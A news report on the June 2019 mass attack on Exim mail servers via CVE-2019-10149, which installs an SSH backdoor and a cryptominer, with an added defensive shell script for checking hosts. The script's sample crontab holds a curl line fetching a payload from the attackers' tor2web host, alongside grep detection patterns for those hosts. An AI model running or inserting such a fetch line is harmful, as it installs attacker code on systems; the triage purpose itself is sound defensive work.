Mass attack on vulnerable Exim-based mail servers

Security researchers at Cybereason have warned mail server administrators about a large-scale automated attack that exploits the critical vulnerability (CVE-2019-10149) in Exim disclosed last week. During the attack, the attackers achieve execution of their code as root and install cryptocurrency-mining malware on the server.

According to a June automated survey, Exim's share is 57.05% (a year ago 56.56%), Postfix is used on 34.52% (33.79%) of mail servers, Sendmail on 4.05% (4.59%), and Microsoft Exchange on 0.57% (0.85%). According to the Shodan service, more than 3.6 million mail servers on the global network remain potentially vulnerable, not having been updated to the current Exim 4.92 release. About 2 million potentially vulnerable servers are in the US, and 2 thousand in Russia. According to RiskIQ, 70% of Exim servers have already moved to version 4.92.


Administrators are advised to urgently install the updates that distributions prepared last week (Debian, Ubuntu, openSUSE, Arch Linux, Fedora, EPEL for RHEL/CentOS). If the system has a vulnerable version of Exim (4.87 through 4.91 inclusive), you should make sure the system has not already been compromised by checking crontab for suspicious entries and making sure there are no extra keys in the /root/.ssh directory. An attack may also be indicated by the presence in the firewall log of activity involving the hosts an7kmd2wp4xo7hpr.tor2web.su, an7kmd2wp4xo7hpr.tor2web.io and an7kmd2wp4xo7hpr.onion.sh, which are used when the malware is downloaded.
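The three checks recommended above (vulnerable Exim version range, unexpected keys in /root/.ssh, and log or crontab references to the download hosts) can be scripted. The following POSIX shell script is an added example and is not code from the opennet.ru article, from Cybereason, or from the Exim project; the hostnames are the ones quoted above, while the version strings, log lines, authorized_keys content and crontab line it runs on are constructed samples written to a temporary directory.

```shell
#!/bin/sh
# Added example (not from the article): triage helpers for a host that ran
# Exim 4.87-4.91 during the June 2019 attack. The IOC hostnames are the ones
# the article quotes; all sample inputs in run_demo are constructed.

IOC_HOSTS="an7kmd2wp4xo7hpr.tor2web.su an7kmd2wp4xo7hpr.tor2web.io an7kmd2wp4xo7hpr.onion.sh"

# exim_version_vulnerable VERSION -> exit 0 when 4.87 <= VERSION <= 4.91.
# Accepts "4.91", "4.91.1" or "4.92-RC1"; only the first two components count.
exim_version_vulnerable() {
    major=$(printf '%s' "$1" | sed 's/^\([0-9]*\).*/\1/')
    minor=$(printf '%s' "$1" | sed 's/^[0-9]*\.\([0-9]*\).*/\1/')
    [ "${major:-0}" -eq 4 ] && [ "${minor:-0}" -ge 87 ] && [ "${minor:-0}" -le 91 ]
}

# count_ioc_hits LOGFILE -> prints how many lines mention one of the hosts
# the article associates with the malware download.
count_ioc_hits() {
    hits=0
    for host in $IOC_HOSTS; do
        n=$(grep -c -F "$host" "$1" || true)   # grep -c exits 1 on zero matches
        hits=$((hits + n))
    done
    echo "$hits"
}

# count_authorized_keys KEYFILE -> prints the number of key entries (non-blank,
# non-comment lines); compare with the number of keys you expect for root.
count_authorized_keys() {
    [ -f "$1" ] || { echo 0; return 0; }
    grep -c -v -E '^[[:space:]]*(#|$)' "$1" || true
}

# count_suspicious_cron CRONFILE -> prints crontab lines referring to a
# tor2web gateway, a .onion address or the IOC hidden-service name.
count_suspicious_cron() {
    [ -f "$1" ] || { echo 0; return 0; }
    grep -c -E 'tor2web|\.onion|an7kmd2wp4xo7hpr' "$1" || true
}

# run_demo -> runs all checks on constructed samples, prints one line per
# finding and a final "flagged=N" line; always returns 0.
run_demo() {
    dir=$(mktemp -d)
    # constructed log lines (format is illustrative, not a real firewall format)
    cat > "$dir/firewall.log" <<'EOF'
Jun 13 04:12:01 mx1 fw: OUT=eth0 DST=198.51.100.7 DPT=443 HOST=an7kmd2wp4xo7hpr.tor2web.su
Jun 13 04:12:03 mx1 fw: OUT=eth0 DST=203.0.113.9 DPT=443 HOST=example.org
Jun 13 04:12:09 mx1 fw: OUT=eth0 DST=198.51.100.8 DPT=80 HOST=an7kmd2wp4xo7hpr.onion.sh
EOF
    # constructed authorized_keys: one expected key plus one the admin did not add
    cat > "$dir/authorized_keys" <<'EOF'
# admin workstation
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC0EXAMPLEKEY1 admin@workstation
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC0EXAMPLEKEY2
EOF
    # constructed root crontab with one entry fetching from a tor2web gateway
    cat > "$dir/root.cron" <<'EOF'
0 * * * * /usr/bin/curl -s -o /tmp/a.ico https://an7kmd2wp4xo7hpr.tor2web.io/a.ico
EOF
    flagged=0
    expected_keys=1
    if exim_version_vulnerable "4.91"; then
        echo "exim: version 4.91 is in the vulnerable range, update to 4.92"
        flagged=$((flagged + 1))
    fi
    hits=$(count_ioc_hits "$dir/firewall.log")
    if [ "$hits" -gt 0 ]; then
        echo "log: $hits line(s) reference the download hosts"
        flagged=$((flagged + 1))
    fi
    keys=$(count_authorized_keys "$dir/authorized_keys")
    if [ "$keys" -gt "$expected_keys" ]; then
        echo "ssh: $keys root keys present, expected $expected_keys"
        flagged=$((flagged + 1))
    fi
    cron=$(count_suspicious_cron "$dir/root.cron")
    if [ "$cron" -gt 0 ]; then
        echo "cron: $cron suspicious crontab entries"
        flagged=$((flagged + 1))
    fi
    rm -rf "$dir"
    echo "flagged=$flagged"
    return 0
}

run_demo
```

On a real host, replace the constructed paths with the output of `exim -bV`, the actual /root/.ssh/authorized_keys, `crontab -l -u root` and your firewall or proxy log; the key count is only meaningful against the number of keys you know you installed.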

The first attacks on Exim servers were recorded on 9 June. By 13 June the attack had become massive. After the vulnerability is exploited, a script is downloaded via tor2web gateways from a Tor hidden service (an7kmd2wp4xo7hpr); it checks for the presence of OpenSSH (installing it if absent), changes its settings (enabling root login and key authentication) and installs an RSA key for the root user that provides privileged access to the system via SSH.

After the backdoor is set up, a port scanner is installed on the system to find other vulnerable servers. The system is also searched for existing mining software, which is removed if found. In the final stage, the attackers' own miner is downloaded and registered in crontab. The miner is downloaded disguised as an ico file (actually a zip archive with the password "no-password") that contains an executable in ELF format for Linux with Glibc 2.7+.

Source: opennet.ru
